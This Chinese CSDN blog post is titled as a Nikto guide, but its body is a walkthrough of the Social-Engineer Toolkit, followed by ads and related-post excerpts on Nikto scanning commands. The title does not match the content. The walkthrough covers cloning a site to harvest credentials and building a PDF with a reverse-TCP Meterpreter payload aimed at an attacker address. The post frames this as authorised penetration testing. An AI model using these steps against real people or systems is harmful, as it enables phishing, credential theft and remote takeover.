揭秘最为知名的黑客工具之一:Nikto(非常详细)零基础入门到精通,收藏这一篇就够了

于 2024-07-18 09:00:26 发布
阅读量485 收藏 3
点赞数 4
分类专栏: 程序员 计算机 互联网 文章标签: web安全 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Libra1313/article/details/140512429
版权
程序员 同时被 3 个专栏收录
368 篇文章 13 订阅
订阅专栏
计算机
367 篇文章 2 订阅
订阅专栏
互联网
367 篇文章 3 订阅
订阅专栏

用心做分享,只为给您最好的学习教程

如果您觉得文章不错,欢迎持续学习

Social-Engineer Toolkit (SET) 工具介绍与使用教程

工具介绍

Social-Engineer Toolkit (SET) 是一个开源的渗透测试框架,专门用于进行社会工程学攻击。SET 由 TrustedSec 创始人 David Kennedy 开发,旨在模拟各种社会工程攻击,以帮助安全研究人员和系统管理员测试和提高系统的安全性。该工具支持多种攻击向量,包括钓鱼攻击、恶意文件生成、网站克隆等。

功能与特点

  • 多种攻击向量:支持钓鱼攻击、恶意文件生成、网站克隆、短信钓鱼等多种社会工程攻击。

  • 模块化设计:具有模块化的架构,可以方便地添加、删除和更新攻击模块。

  • 自动化攻击:提供自动化攻击选项,简化了攻击过程,适合不同技术水平的用户。

  • 集成 Metasploit:与 Metasploit 框架集成,增强了攻击能力和可操作性。

使用教程

以下是使用 Social-Engineer Toolkit 进行社会工程学攻击的详细教程。

步骤一:安装 SET

在 Kali Linux 上安装

更新系统包管理器:

打开终端,运行以下命令更新系统包管理器:



`sudo apt update`

安装 SET:

使用包管理器安装 SET:



`sudo apt install set`

启动 SET:

安装完成后,启动 SET:



`sudo setoolkit`

在其他 Linux 发行版上安装

克隆 SET 仓库:

从 GitHub 仓库克隆 SET 源代码:



`git clone https://github.com/trustedsec/social-engineer-toolkit.git`

进入 SET 目录:



`cd social-engineer-toolkit`

安装依赖:

安装 SET 所需的依赖:



`sudo python3 setup.py install`

启动 SET:

安装完成后,启动 SET:



`sudo setoolkit`

步骤二:使用 SET 进行钓鱼攻击

选择攻击类型:

启动 SET 后,将看到一个菜单。选择“1) Social-Engineering Attacks”:



`1) Social-Engineering Attacks``2) Penetration Testing (Fast-Track)``3) Third Party Modules``4) Update the Social-Engineer Toolkit``5) Update SET configuration``6) Help, Credits, and About`





`Enter your choice: 1`

选择攻击向量:

选择“2) Website Attack Vectors”:



`1) Spear-Phishing Attack Vectors``2) Website Attack Vectors``3) Infectious Media Generator``4) Create a Payload and Listener``5) Mass Mailer Attack``6) Arduino-Based Attack Vector``7) SMS Spoofing Attack Vector``8) Wireless Access Point Attack Vector``9) QRCode Generator Attack Vector``10) Powershell Attack Vectors``11) Third Party Modules`





`Enter your choice: 2`

选择具体攻击方法:

选择“3) Credential Harvester Attack Method”:



`1) Java Applet Attack Method``2) Metasploit Browser Exploit Method``3) Credential Harvester Attack Method``4) Tabnabbing Attack Method``5) Web Jacking Attack Method``6) Multi-Attack Web Method``7) HTA Attack Method`





`Enter your choice: 3`

选择攻击模式:

选择“2) Site Cloner”以克隆目标网站:



`1) Web Templates``2) Site Cloner``3) Custom Import`





`Enter your choice: 2`

输入目标 URL:

输入要克隆的目标网站 URL,例如:



`Enter the URL to clone: http://example.com`

启动 Apache 服务器:

SET 会提示你是否要启动 Apache 服务器,选择“yes”以继续:



`Do you want to start the Apache server [yes|no]: yes`

步骤三:监控和收集凭据

监控收集的凭据:

在攻击进行中,可以通过 SET 控制台监控收集到的凭据信息。所有输入的凭据将显示在终端中。

步骤四:生成恶意文件

选择攻击类型:

在 SET 主菜单中选择“1) Social-Engineering Attacks”:



`Enter your choice: 1`

选择攻击向量:

选择“1) Spear-Phishing Attack Vectors”:



`Enter your choice: 1`

选择攻击方法:

选择“2) Create a FileFormat Payload”:



`Enter your choice: 2`

选择攻击载荷:

选择“5) Windows Reverse_TCP Meterpreter”:



`Enter your choice: 5`

设置监听主机和端口:

设置攻击者的 IP 地址和监听端口,例如:



`Enter the IP address (LHOST) for the payload: 192.168.1.100``Enter the port (LPORT) for the payload: 4444`

选择文件格式:

选择“16) PDF Embedded EXE Social Engineering”:



`Enter your choice: 16`

生成文件:

SET 将生成一个恶意 PDF 文件,发送给目标用户。当目标用户打开该文件时,攻击载荷将执行。

总结

Social-Engineer Toolkit (SET) 是一款功能强大的社会工程学攻击工具,通过其多种攻击向量和模块化设计,可以帮助安全研究人员和系统管理员测试和提高系统的安全性。本文详细介绍了 SET 的安装、钓鱼攻击和生成恶意文件的使用方法,帮助用户快速掌握该工具的使用技巧。在实际操作中,请务必遵守相关法律法规,仅在合法授权的情况下使用该工具。

通过使用 SET,安全研究人员和系统管理员可以更加全面地了解系统的社会工程学攻击风险,及时采取措施,提高系统的整体安全性。

在这里插入图片描述

行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
在这里插入图片描述
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]


在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
在这里插入图片描述

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

黑客大白
关注
专栏目录
nikto工具的用法描述(漏洞分析)
5年编程经验的老猿。
09-23 2695
Nikto是一个开放源代码(GPL)Web服务器扫描程序,它针对多个项目对Web服务器执行全面测试,包括6700多个潜在危险的文件/程序,检查1250多个服务器的过时版本以及270多个服务器上的特定于版本的问题。它还会检查服务器配置项,例如是否存在多个索引文件,HTTP服务器选项,并将尝试识别已安装Web服务器和软件。扫描项目和插件会经常更新,并且可以自动更新。...
Kali Linux渗透测试之扫描工具——Nikto
橘子女侠
06-14 8664
扫描工具—Nikto 1. Nikto Nikto 是由Perl语言开发的开源代码、功能强大的WEB扫描评估软件,能对web服务器多种安全项目进行测试的扫描软件。 它支持两种扫描模式,代理截断模式和主动扫描模式。 2. 手动扫描与自动扫描 手动扫描:用户手动去点击页面,发现页面存在的问题,但可能会存在遗漏。 自动扫描:基于字典的扫描,可以提高扫描的速度,但存在误报和触发警告,容易...
Nikto安全扫描工具
08-14
Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。 root@91ri.org:~# cd /pentest/web/nikto/ root@91ri.org:/pentest/web/nikto# ls docs nikto.conf nikto.pl plugins templates root@91ri.org:/pentest/web/nikto# ./nikto.pl -h Option host requires an argument -config+ Use this config file -Cgidirs+ scan these CGI dirs: ‘none’, ‘all’, or values like “/cgi/ /cgi-a/” -dbcheck check database and other key files for syntax errors -Display+ Turn on/off display outputs -evasion+ ids evasion technique -Format+ save file (-o) format -host+ target host -Help Extended help information -id+ Host authentication to use, format is id:pass or id:pass:realm -list-plugins List all available plugins -mutate+ Guess additional file names -mutate-options+ Provide extra information for mutations -output+ Write output to this file -nocache Disables the URI cache -nossl Disables using SSL -no404 Disables 404 checks -port+ Port to use (default 80) -Plugins+ List of plugins to run (default: ALL) -root+ Prepend root value to all requests, format is /directory -ssl Force ssl mode on port -Single Single request mode -timeout+ Timeout (default 2 seconds) -Tuning+ Scan tuning -update Update databases and plugins from CIRT.net -vhost+ Virtual host (for Host header) -Version Print plugin and database versions + requires a value Note: This is the short help output. Use -H for full help. 升级插件 root@91ri.org:/pentest/web/nikto# ./nikto.pl -update -h 指定扫描的目标 –p 端口 root@91ri.org:/pentest/web/nikto# ./nikto.pl -h www.91ri.org -p 80 -C 指定CGI目录 –all表示猜解CGI目录 root@91ri.org:/pentest/web/nikto# ./nikto.pl -h www.91ri.org -C all -T选项包含很多小选项 –T 9表示扫描SQL注入漏洞 root@91ri.org:/pentest/web/nikto# ./nikto.pl -h www.91ri.org -T 9 -D指定输出显示 2显示cookies root@91ri.org:/pentest/web/nikto# ./nikto.pl -h www.91ri.org -D 2 -T选项包含的小选项解释: 0 检查文件上传页面 1 检查web日志 2 检查错误配置或默认文件 3检查信息泄露问题 4 检查XSS/Script/HTML问题 5 从根目录检查是否存在可访问的文件 6 检查拒绝服务问题 7 从任意文件检索是否存在可访问文件 8 检查是否存在系统命令执行漏洞 9 检查SQL注入漏洞 a 检查认证绕过问题 b 识别安装的软件版本 c 检查源代码泄露问题 x 反向链接选项
nikto的使用教程详解
lvwuwei的博客
05-15 1837
1:普通扫描 nikto -h 目标 实例: nikto -h 192.168.3.111 2:扫描指定端口 nikto -h 192.168.0.1 -p 443 对443端口的扫描 nikto -h 192.168.3.111 -p 443 3:目录猜解 -C 指定CGI目录 –all表示猜解CGI目录 nikto -h 192.168.3.111 -C all 4:漏洞扫描 -T选项包含很多小选项 –T 9表示扫描SQL注入漏洞 -T选项包含的小选项解释: 0 检查文件上传页面 1 检查web日志 2
nikto使用教程
huike008的博客
08-17 353
简单扫描 目标基本WEB基本配制信息,服务器,PHP解析器等版本信息 perl nkito.pl –h 192.168.0.1 多端口扫描 Perl nikto.pl –h 192.168.0.1 –p 80,88,443 加代理扫描 Perl nikto.pl –h 192.168.0.1 –p 80 –u CGI扫描 -C参数只能放在后面,应该可以指定相对目录。 Perl...
【Kali Linux工具篇】nikto 的介绍与使用
最新发布
失心少年
07-10 501
nikto是一款比较综合性的漏洞扫描工具。支持XSS SQL注入等常见的漏洞扫描,因其使用简单,扫描效率比较高。因而深受肾透者们的喜欢。
Nikto工具使用指南
Ays.Ie的博客
03-05 1606
该篇讲述了Nikto的使用指南
nikto:Nikto Web服务器扫描仪
04-28
NiktoWeb服务器扫描仪- 完整文档 正常运行: git clone https://github.com/sullo/nikto # Main script is in program/ cd nikto/program # Run using the shebang interpreter ./nikto.pl -h ...
Nikto:从零开始到专业版的完整教程
简介
01-10 7131
nikto教程
nikto for windows(web扫描工具) 使用教程
weixin_34375251的博客
10-19 1744
本文出处: 欧普软件-------------------------------------------------------------------------------------------------------------------------------------------------------------------- 转载于:https://www.cnblogs.c...
nikto使用说明
weixin_34388207的博客
08-07 235
Nikto是一款开放源代码的、功能强大的WEB扫描评估软件,能对web服务器多种安全项目进行测试的扫描软件,能在230多种服务器上扫描出2600多种有潜在危险的文件、CGI及其他问题,它可以扫描指定主机的WEB类型、主机名、特定目录、COOKIE、特定CGI漏洞、返回主机允许的http模式等等。它也使用LibWhiske库,但通常比Whisker更新的更为频繁。Nikto是网...
漏洞扫描工具nikto使用心得
cnbird's blog
06-26 3343
#http://www.cirt.net/  官方网站# site http://www.feelids.com*/# Author:swap简单扫描   目标基本WEB基本配制信息,服务器,PHP解析器等版本信息perl nkito.pl –h 192.168.0.1多端口扫描Perl nikto.pl –h 192.168.0.1 –p 80,88,443加
Nikto详细使用教程
热门推荐
星落的博客
05-08 4万+
Nikto简介 基于perl语言开发的web页面扫描器。其特点扫描全面,速度快。 nikto常用命令 -upodate 升级,更新插件 -host 扫描目标URl -id username:password http认证接口 -list-plugins ...
网络扫描工具:nikto简单介绍
MyBack
06-01 943
root@firecat:~# nikto -H Options: -ask+ Whether to ask about submitting updates yes Ask about each (default) no
Web漏洞扫描神器Nikto使用指南
liver100day的博客
11-18 1万+
文章目录工具简介工具下载链接nikto安装nikto基础语句指定端口进行扫描指定目录进行扫描多目标扫描其他功能扫描结果输出Nikto扫描交互参数IDS 躲避使用代理扫描后言 工具简介 Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件/CGIs;超过625种服务器版本;超过230种特定服务器问题。扫描项和插件可以自动更新(如果需要)。但其软件本身并不经常更新,最新和最危险的可能会检测不到。 工具下载链接 官方网站:https://cir
Nikto
wwwwwhdn的博客
11-07 88
Nikto是一款常用的开源网络安全扫描工具,专门用于发现和评估Web服务器上的潜在安全漏洞和配置错误。它由CIRT(计算机应急响应团队)开发,并广泛用于安全测试、漏洞评估和渗透测试。Nikto能够对目标主机进行全面的扫描,包括对常见漏洞、敏感文件和目录、不安全的配置等进行检查。它通过发送HTTP请求并分析服务器的响应来发现潜在的安全问题。Nikto能够检查多个方面的安全性,如服务器配置、CGI脚本、默认文件、SSL/TLS设置等。
nikto工具使用
单核CPU的小朋友的博客
03-19 1677
分享一个大神的人工智能教程。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到人工智能的队伍中来!http://www.captainbed.net/xiaohei NIKTO相关参数: 1、 -Cgidirs 扫描相关CGI文件夹,传入单词“none”或者是“all”可以扫描所有CGI目录。后面可以加入/cgi-bin/来指定扫描目录。或者传入参数all扫描所有目录。 2、 -config ...
Nikto使用方法
收集盒 Book box
12-06 2051
Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。 root@91ri.org:~# cd /pentest/web/nikto/ root@91ri.org:/pentest/web/nikto# ls docs nikto.conf nikto.pl plugins tem
nikto 参数详解与详细翻译文档
Nikto是一款广泛使用的开源网络扫描工具,主要用于检测Web服务器的安全漏洞。这份文档详细解释了nikto命令行参数的中文翻译和功能说明,以便对中国用户进行更直观的理解。以下是一些关键参数的解读: 1. `-ask`:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值